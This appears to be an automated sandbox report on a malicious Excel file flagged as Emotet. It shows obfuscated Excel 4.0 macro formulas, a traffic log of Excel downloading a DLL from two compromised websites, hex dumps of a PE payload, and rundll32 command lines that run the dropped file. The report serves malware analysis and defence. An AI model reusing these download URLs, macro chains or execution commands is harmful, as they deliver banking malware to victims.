                                          1,3,=FORMULA()=FORMULA()=FORMULA('Buk1'!E11,'Buk2'!B12)=FORMULA('Buk2'!H5,'Buk3'!H3)=FORMULA('Buk3'!C9,'Buk4'!C2)=FORMULA('Buk4'!I8,'Buk5'!F2)=FORMULA('Buk5'!B12,'Buk6'!B10)=FORMULA('Buk6'!G3,'Buk7'!I2)=FORMULA('Buk7'!D13,'Buk1'!A3)=FORMULA('Buk3'!H3&'Ss1'!O6&'Ss1'!D16&'Ss1'!K13&'Ss1'!R12&'Ss1'!R14,D3)=FORMULA('Buk3'!H3&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!B9,D17)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!R11&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!L5&'Ss1'!R14,D19)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA1"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!R11&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!O9&'Ss1'!R14,D21)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA2"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!M20&'Ss1'!K23&'Ss1'!N24&'Ss1'!P18&'Ss1'!K18&'Ss1'!R12&'Ss1'!I8&'Ss1'!R14&'Ss1'!R7&'Ss1'!R14,D23)=FORMULA('Buk3'!H3&'Ss1'!J7&'Ss1'!N15&'Ss1'!J7&'Ss1'!M20&'Ss1'!R12&'Ss1'!R16&Ss1br2!Q3&Ss1br2!K10&Ss1br2!I1&'Ss1'!R11&'Ss1'!R5&'Ss1'!R5&'Ss1'!R3&'Ss1'!P2&'Ss1'!O1&'Ss1'!O9&'Ss1'!N5&'Ss1'!F3&'Ss1'!R5&'Ss1'!B9&'Ss1'!I12&'Ss1'!K8&'Ss1'!R7&'Ss1'!R16&'Ss1'!R18&"LKLW"&'Ss1'!R14,D25)=FORMULA('Buk3'!H3&'Ss1'!K54&'Ss1'!K56&'Ss1'!J58&'Ss1'!M52&'Ss1'!K54&'Ss1'!M61&'Ss1'!R12&'Ss1'!R14,D32)
                                          
                                          2,7,=
                                          8,2,=CHAR('Ss1'!G40)
                                          
                                          1,2,A
                                          7,8,=CHAR('Ss1'!J39)
                                          
                                          2,6,=CHAR('Ss1'!R41)
                                          9,1,e
                                          

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 2, 2021 14:31:34.448029995 CET4916580192.168.2.22194.233.67.242
                                          Dec 2, 2021 14:31:34.626717091 CET8049165194.233.67.242192.168.2.22
                                          Dec 2, 2021 14:31:34.626876116 CET4916580192.168.2.22194.233.67.242
                                          Dec 2, 2021 14:31:34.627537966 CET4916580192.168.2.22194.233.67.242
                                          Dec 2, 2021 14:31:34.806072950 CET8049165194.233.67.242192.168.2.22
                                          Dec 2, 2021 14:31:35.181148052 CET8049165194.233.67.242192.168.2.22
                                          Dec 2, 2021 14:31:35.181179047 CET8049165194.233.67.242192.168.2.22
                                          Dec 2, 2021 14:31:35.181190968 CET8049165194.233.67.242192.168.2.22
                                          Dec 2, 2021 14:31:35.181201935 CET8049165194.233.67.242192.168.2.22
                                          Dec 2, 2021 14:31:35.181335926 CET4916580192.168.2.22194.233.67.242
                                          Dec 2, 2021 14:31:35.182256937 CET4916580192.168.2.22194.233.67.242
                                          Dec 2, 2021 14:31:35.182326078 CET4916580192.168.2.22194.233.67.242
                                          Dec 2, 2021 14:31:35.237093925 CET8049165194.233.67.242192.168.2.22
                                          Dec 2, 2021 14:31:35.237119913 CET8049165194.233.67.242192.168.2.22
                                          Dec 2, 2021 14:31:35.237214088 CET4916580192.168.2.22194.233.67.242
                                          Dec 2, 2021 14:31:35.237240076 CET4916580192.168.2.22194.233.67.242
                                          Dec 2, 2021 14:31:35.244168997 CET8049165194.233.67.242192.168.2.22
                                          Dec 2, 2021 14:31:35.244185925 CET8049165194.233.67.242192.168.2.22
                                          Dec 2, 2021 14:31:35.244194984 CET8049165194.233.67.242192.168.2.22
                                          Dec 2, 2021 14:31:35.244275093 CET4916580192.168.2.22194.233.67.242
                                          Dec 2, 2021 14:31:35.244307041 CET4916580192.168.2.22194.233.67.242
                                          Dec 2, 2021 14:31:35.244309902 CET4916580192.168.2.22194.233.67.242
                                          Dec 2, 2021 14:31:35.603188038 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:35.863559961 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:35.863759995 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:35.864459038 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.121215105 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.126859903 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.126895905 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.126919031 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.126943111 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.126980066 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.126985073 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.127012968 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.127013922 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.127017021 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.127019882 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.127022028 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.127036095 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.127049923 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.127058983 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.127068996 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.127083063 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.127101898 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.127108097 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.127120972 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.127141953 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.136845112 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.386648893 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.386734009 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.386795998 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.386848927 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.386898041 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.386914015 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.386949062 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.386953115 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.386956930 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.386996031 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.387003899 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.387047052 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.387054920 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.387100935 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.387105942 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.387150049 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.387157917 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.387202978 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.387207985 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.387252092 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.387258053 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.387300968 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.387309074 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.387351036 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.387360096 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.387403965 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.388763905 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.647444963 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.647475004 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.647488117 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.647500992 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.647517920 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.647535086 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.647551060 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.647567034 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.647583961 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.647600889 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.647617102 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.647634029 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.647650003 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.647654057 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.647666931 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.647684097 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.647695065 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.647700071 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.647701979 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.647703886 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.647707939 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.647717953 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.647720098 CET804916647.96.4.95192.168.2.22
                                          Dec 2, 2021 14:31:36.647732019 CET4916680192.168.2.2247.96.4.95
                                          Dec 2, 2021 14:31:36.647738934 CET804916647.96.4.95192.168.2.22

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 2, 2021 14:31:34.415781975 CET5216753192.168.2.228.8.8.8
                                          Dec 2, 2021 14:31:34.435739040 CET53521678.8.8.8192.168.2.22
                                          Dec 2, 2021 14:31:35.191217899 CET5059153192.168.2.228.8.8.8
                                          Dec 2, 2021 14:31:35.600486040 CET53505918.8.8.8192.168.2.22

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Dec 2, 2021 14:31:34.415781975 CET192.168.2.228.8.8.80xea45Standard query (0)sadabahar.com.npA (IP address)IN (0x0001)
                                          Dec 2, 2021 14:31:35.191217899 CET192.168.2.228.8.8.80x2f5bStandard query (0)www.duoyuhudong.cnA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Dec 2, 2021 14:31:34.435739040 CET8.8.8.8192.168.2.220xea45No error (0)sadabahar.com.np194.233.67.242A (IP address)IN (0x0001)
                                          Dec 2, 2021 14:31:35.600486040 CET8.8.8.8192.168.2.220x2f5bNo error (0)www.duoyuhudong.cn47.96.4.95A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • sadabahar.com.np
                                          • www.duoyuhudong.cn

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.2249165194.233.67.24280C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          TimestampkBytes transferredDirectionData
                                          Dec 2, 2021 14:31:34.627537966 CET0OUTGET /wp-includes/pUMqITCt83a/ HTTP/1.1
                                          Accept: */*
                                          UA-CPU: AMD64
                                          Accept-Encoding: gzip, deflate
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Host: sadabahar.com.np
                                          Connection: Keep-Alive
                                          Dec 2, 2021 14:31:35.181148052 CET2INHTTP/1.1 404 Not Found
                                          Connection: Keep-Alive
                                          Keep-Alive: timeout=5, max=100
                                          x-powered-by: PHP/7.4.25
                                          content-type: text/html; charset=UTF-8
                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                          cache-control: no-cache, must-revalidate, max-age=0
                                          link: <https://sadabahar.com.np/wp-json/>; rel="https://api.w.org/"
                                          transfer-encoding: chunked
                                          content-encoding: gzip
                                          vary: Accept-Encoding,User-Agent
                                          date: Thu, 02 Dec 2021 13:31:35 GMT
                                          server: LiteSpeed
                                          Data Raw: 31 30 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 5b ff 73 db 36 b2 ff d9 fe 2b 60 7a 6a 8b 2d 49 51 92 65 59 94 e5 de 35 4d e7 fd d0 5e 6f 9a 76 de bc 49 f2 3c 10 09 51 48 28 80 0f 80 64 fb 14 fd ef 37 0b 90 14 bf c9 56 9c a4 b9 99 d7 78 1c 93 c0 62 b1 58 2c b0 9f 5d 80 d7 27 3f fe fa e2 f7 ff f9 e7 4b b4 50 cb e4 e6 f8 1a fe a0 04 b3 78 6a 11 e6 fe f1 ca ba 39 3e be 5e 10 1c dd 1c 1f 5d 2f 89 c2 28 5c 60 21 89 9a 5a 7f fc fe 93 7b 65 15 e5 0c 2f c9 d4 5a 53 72 97 72 a1 2c 14 72 a6 08 53 53 eb 8e 46 6a 31 8d c8 9a 86 c4 d5 2f 0e a2 8c 2a 8a 13 57 86 38 21 d3 9e 83 96 94 d1 e5 6a 99 17 68 b6 09 65 ef 91 20 c9 d4 4a 05 9f d3 84 58 68 21 c8 7c 6a 2d 94 4a 83 6e 37 5e a6 b1 c7 45 dc bd 9f b3 6e af 07 6d 8e ae 15 55 09 b9 f9 27 8e 09 62 5c a1 39 5f b1 08 9d 9d 5e f5 7b bd 09 7a 85 23 3c c3 0b 2c d0 2f ab 44 51 f4 82 33 a9 c4 2a 54 94 b3 eb ae 69 7a 6c 86 a9 87 73 2e f8 8c 2b 79 5e 0c e6 7c 89 ef 5d ba c4 31 71 53 41 60 b0 41 82 45 4c ce 51 f7 e6 f8 ba 10 f8 3c 62 12 08 e6 44 85 8b 73 23 f5 79 b7 3b e7 4c 49 2f e6 3c 4e 08 4e a9 f4 42 be 3c ac a5 f4 ee 60 a4 35 62 0b 27 8a 08 86 15 b1 90 7a 48 c9 d4 c2 69 9a d0 10 c3 78 ba 42 ca ef ee 97 89 85 f4 b8 a6 d6 63 83 47 67 02 ff df 8a 4f d0 4f 84 44 65 35 cb a0 db 95 b9 d6 40 5e 8f a5 dd 39 21 51 d7 aa 0e f9 0b c8 f2 82 2f 97 84 29 79 98 50 61 46 5d 92 ee e8 e8 5a 86 82 a6 2a d3 8e 22 f7 aa fb 0e af b1 29 d5 06 73 74 47 59 c4 ef bc db bb 94 2c f9 3b fa 8a 28 45 59 2c d1 14 6d ac 19 96 e4 0f 91 58 81 36 39 19 bc e9 be e9 66 53 f1 a6 ab cd 40 be e9 86 5c 90 37 5d dd f8 4d b7 37 f0 7a 9e ff a6 3b ea df 8f fa 6f ba 96 63 91 7b 65 05 96 97 b2 d8 72 2c b9 8e 9f c7 4f ae 63 cd 4d ae e3 97 86 a1 5c 6b 86 7c 25 42 62 05 1b 2b e4 2c c4 4a 8b 91 c9 6b c4 ad 4d de 9b ee 5d ea 52 16 26 ab 88 c8 37 dd 77 52 17 e8 66 ae 20 09 c1 92 78 4b ca bc 77 f2 fb 35 11 d3 a1 77 e5 f5 ad ed 76 72 7c 74 74 74 32 5f 31 bd 56 3a c4 c1 8e b2 37 6b 2c 10 73 84 c3 1d 3a c5 5e 28 08 56 e4 65 42 60 d6 3a 56 88 d9 1a 4b cb 76 d2 29 f5 62 a2 5e c0 86 70 af ce ce ca 6f 1d ab 1f 59 f6 24 67 8c 64 87 e4 8c f1 f4 95 12 94 c5 de 5c f0 e5 8b 05 16 2f 78 44 26 a9 17 26 04 8b df 48 a8 3a be e3 3b d4 33 5b 0a f5 16 84 c6 0b 65 3b a9 37 a7 49 f2 3b b9 57 1d ec c1 82 78 e8 a8 05 95 0e b1 1d df f1 ed 09 99 52 4f f1 1f b1 c2 7f fc f6 73 c7 9e 08 a2 56 82 a1 e7 33 56 86 b1 43 a6 d3 2a eb 6d 31 ac b0 43 8c b6 54 53 4f 99 31 da 13 e5 49 11 4e 89 a3 bc 88 cc 89 98 2a cf 2c ea ba d9 3a 18 d4 99 e9 59 fe f0 f0 3b 8e ff 81 97 a4 63 c1 3e 6d d9 af fd b7 30 6c c2 a2 17 0b 9a 44 1d 65 6f e7 5c 74 f8 f4 ef 42 e0 87 8e 35 4f 30 58 8e b1 14 db 51 9e 5c a5 b0 65 cb e9 86 ac 89 78 50 0b ca e2 e0 c4 77 76 6f 2f ef 43 92 aa 9f 12 0c e5
                                          Data Ascii: 108c[s6+`zj-IQeY5M^ovI<QH(d7VxbX,]'?KPxj9>^]/(\`!Z{e/ZSrr,rSSFj1/*W8!jhe JXh!|j-Jn7^EnmU'b\9_^{z#<,/DQ3*Tizls.+y^|]1qSA`AELQ<bDs#y;LI/<NNB<`5b'zHixBcGgOODe5@^9!Q/)yPaF]Z*")stGY,;(EY,mX69fS@\7]M7z;oc{er,OcM\k|%Bb+,JkM]R&7wRf xKw5wvr|ttt2_1V:7k,s:^(VeB`:VKv)b^poY$gd\/xD&&H:;3[e;7I;WxROsV3VC*m1CTSO1IN*,:Y;c>m0lDeo\tB5O0XQ\exPwvo/C


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.224916647.96.4.9580C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          TimestampkBytes transferredDirectionData
                                          Dec 2, 2021 14:31:35.864459038 CET10OUTGET /wp-content/we8xi/ HTTP/1.1
                                          Accept: */*
                                          UA-CPU: AMD64
                                          Accept-Encoding: gzip, deflate
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Host: www.duoyuhudong.cn
                                          Connection: Keep-Alive
                                          Dec 2, 2021 14:31:36.126859903 CET12INHTTP/1.1 200 OK
                                          Server: nginx/1.8.1
                                          Date: Thu, 02 Dec 2021 13:31:35 GMT
                                          Content-Type: application/x-msdownload
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/7.2.15
                                          Set-Cookie: 61a8cab7f1108=1638451895; expires=Thu, 02-Dec-2021 13:32:35 GMT; Max-Age=60; path=/
                                          Cache-Control: no-cache, must-revalidate
                                          Pragma: no-cache
                                          Last-Modified: Thu, 02 Dec 2021 13:31:35 GMT
                                          Expires: Thu, 02 Dec 2021 13:31:35 GMT
                                          Content-Disposition: attachment; filename="VZZdgPFp2xiOJtfpv.dll"
                                          Content-Transfer-Encoding: binary
                                          Data Raw: 31 65 35 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d2 30 86 d7 96 51 e8 84 96 51 e8 84 96 51 e8 84 45 23 eb 85 9c 51 e8 84 45 23 ed 85 1e 51 e8 84 45 23 ec 85 82 51 e8 84 2f 24 ed 85 94 51 e8 84 c4 24 ed 85 b4 51 e8 84 c4 24 ec 85 99 51 e8 84 c4 24 eb 85 82 51 e8 84 45 23 e9 85 93 51 e8 84 96 51 e9 84 f7 51 e8 84 96 51 e8 84 97 51 e8 84 2f 24 e8 85 97 51 e8 84 2f 24 ea 85 97 51 e8 84 52 69 63 68 96 51 e8 84 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0e 10 a7 61 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 1d 00 66 02 00 00 52 03 00 00 00 00 00 01 a4 01 00 00 10 00 00 00 80 02 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 05 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 90 83 05 00 ac 08 00 00 3c 8c 05 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 05 00 b0 1b 00 00 dc 6f 05 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 71 05 00 18 00 00 00 30 70 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 02 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 64 02 00 00 10 00 00 00 66 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fa 13 03 00 00 80 02 00 00 14 03 00 00 6a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 18 00 00 00 a0 05 00 00 0e 00 00 00 7e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 6c 06 00 00 00 c0 05 00 00 08 00 00 00 8c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 b0 1b 00 00 00 d0 05 00 00 1c 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii: 1e50MZ@!L!This program cannot be run in DOS mode.$0QQQE#QE#QE#Q/$Q$Q$Q$QE#QQQQQ/$Q/$QRichQPELa"!fR@<<oTq0p@T.textdf `.rdataj@@.dataD~@.pdatal@.reloc@B


                                          Code Manipulations

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Start time:14:31:17
                                          Start date:02/12/2021
                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                          Imagebase:0x13fd50000
                                          File size:28253536 bytes
                                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:14:31:25
                                          Start date:02/12/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889
                                          Imagebase:0x250000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.555217971.000000000029D000.00000004.00000020.sdmp, Author: Joe Security
                                          Reputation:high

                                          General

                                          Start time:14:31:56
                                          Start date:02/12/2021
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                          Imagebase:0xff860000
                                          File size:27136 bytes
                                          MD5 hash:C78655BC80301D76ED4FEF1C1EA40A7D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          General

                                          Start time:14:32:26
                                          Start date:02/12/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL
                                          Imagebase:0x250000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:high

                                          General

                                          Start time:14:33:31
                                          Start date:02/12/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc",qEPqGlpBy
                                          Imagebase:0x250000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis

                                          Reset < >